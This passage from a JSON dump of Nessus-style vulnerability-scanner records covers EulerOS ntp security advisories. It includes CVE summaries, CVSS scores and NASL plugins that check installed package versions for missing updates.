script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-25.1.h17\",\n \"ntpdate-4.2.6p5-25.1.h17\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:59:37", "description": "According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-24T00:00:00", "title": "EulerOS 2.0 SP3 : ntp (EulerOS-SA-2019-2066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7855", "CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7853"], "modified": "2019-09-24T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2066.NASL", "href": "https://www.tenable.com/plugins/nessus/129259", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129259);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-7705\",\n \"CVE-2015-7850\",\n \"CVE-2015-7853\",\n \"CVE-2015-7855\",\n \"CVE-2015-7871\",\n \"CVE-2015-7976\",\n \"CVE-2018-7185\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : ntp (EulerOS-SA-2019-2066)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.(CVE-2015-7853)\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.(CVE-2015-7871)\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.(CVE-2015-7855)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2066\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d38c467a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-25.0.1.h19\",\n \"ntpdate-4.2.6p5-25.0.1.h19\",\n \"sntp-4.2.6p5-25.0.1.h19\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:55:12", "description": "According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.i1/4^CVE-2015-7705i1/4%0\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.i1/4^CVE-2015-7853i1/4%0\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.i1/4^CVE-2015-7871i1/4%0\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its\n association.i1/4^CVE-2018-7185i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "EulerOS Virtualization 2.5.3 : ntp (EulerOS-SA-2019-1222)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185", "CVE-2015-7871", "CVE-2015-7705", "CVE-2015-7853"], "modified": "2019-04-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:uvp:2.5.3"], "id": "EULEROS_SA-2019-1222.NASL", "href": "https://www.tenable.com/plugins/nessus/123908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123908);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-7705\",\n \"CVE-2015-7853\",\n \"CVE-2015-7871\",\n \"CVE-2018-7185\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.3 : ntp (EulerOS-SA-2019-1222)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.i1/4^CVE-2015-7705i1/4%0\n\n - The datalen parameter in the refclock driver in NTP\n 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows\n remote attackers to execute arbitrary code or cause a\n denial of service (crash) via a negative input\n value.i1/4^CVE-2015-7853i1/4%0\n\n - Crypto-NAK packets in ntpd in NTP 4.2.x before 4.2.8p4,\n and 4.3.x before 4.3.77 allows remote attackers to\n bypass authentication.i1/4^CVE-2015-7871i1/4%0\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its\n association.i1/4^CVE-2018-7185i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1222\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?61974c80\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.3\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.3\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-25.0.1.h18\",\n \"ntpdate-4.2.6p5-25.0.1.h18\",\n \"sntp-4.2.6p5-25.0.1.h18\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:55:30", "description": "According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-01T00:00:00", "title": "EulerOS 2.0 SP5 : ntp (EulerOS-SA-2019-1323)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185", "CVE-2015-7976", "CVE-2015-7705", "CVE-2015-7850"], "modified": "2019-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ntpdate", "p-cpe:/a:huawei:euleros:ntp", "p-cpe:/a:huawei:euleros:sntp", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-1323.NASL", "href": "https://www.tenable.com/plugins/nessus/124450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124450);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-7705\",\n \"CVE-2015-7850\",\n \"CVE-2015-7976\",\n \"CVE-2018-7185\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ntp (EulerOS-SA-2019-1323)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ntp packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - The rate limiting feature in NTP 4.x before 4.2.8p4 and\n 4.3.x before 4.3.77 allows remote attackers to have\n unspecified impact via a large number of crafted\n requests.\n\n - Mitigation:Do not add the 'limited' configuration\n option to any restrict lines in the ntp.conf\n file.(CVE-2015-7705)\n\n - The protocol engine in ntp 4.2.6 before 4.2.8p11 allows\n a remote attackers to cause a denial of service\n (disruption) by continually sending a packet with a\n zero-origin timestamp and source IP address of the\n 'other side' of an interleaved association causing the\n victim ntpd to reset its association(CVE-2018-7185)\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.(CVE-2015-7976)\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.\n\n - Mitigation:Disable NTP remote configuration or limit\n this feature to trusted users to effectively mitigate\n this risk(CVE-2015-7850)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1323\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a99aeb5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ntp-4.2.6p5-28.h8.eulerosv2r7\",\n \"ntpdate-4.2.6p5-28.h8.eulerosv2r7\",\n \"sntp-4.2.6p5-28.h8.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:55:14", "description": "According to the versions of the ntp packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The ntpq saveconfig command in NTP 4.1.2, 4.2.x before\n 4.2.8p6, 4.3, 4.3.25, 4.3.70, and 4.3.77 does not\n properly filter special characters, which allows\n attackers to cause unspecified impact via a crafted\n filename.i1/4^CVE-2015-7976i1/4%0\n\n - ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before\n 4.3.77 allows remote authenticated users to cause a\n denial of service (infinite loop or crash) by pointing\n the key file at the log file.i1/4^CVE-2015-7850i1/4%0\n\n - The decodenetnum function in ntpd in NTP 4.2.x before\n 4.2.8p4, and 4.3.x before 4.3.77 allows remote\n attackers to cause a denial of service (assertion\n failure) via a 6 or mode 7 packet containing a long\n data value.i1/4^CVE-2015-7855i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 9, "cvss3": {"score": 4.3, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"}, "published": "2019-04-04T00:00:00", "title": "EulerOS Virtualization 2.5.3 : ntp (EulerOS-SA-2019-1230)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": 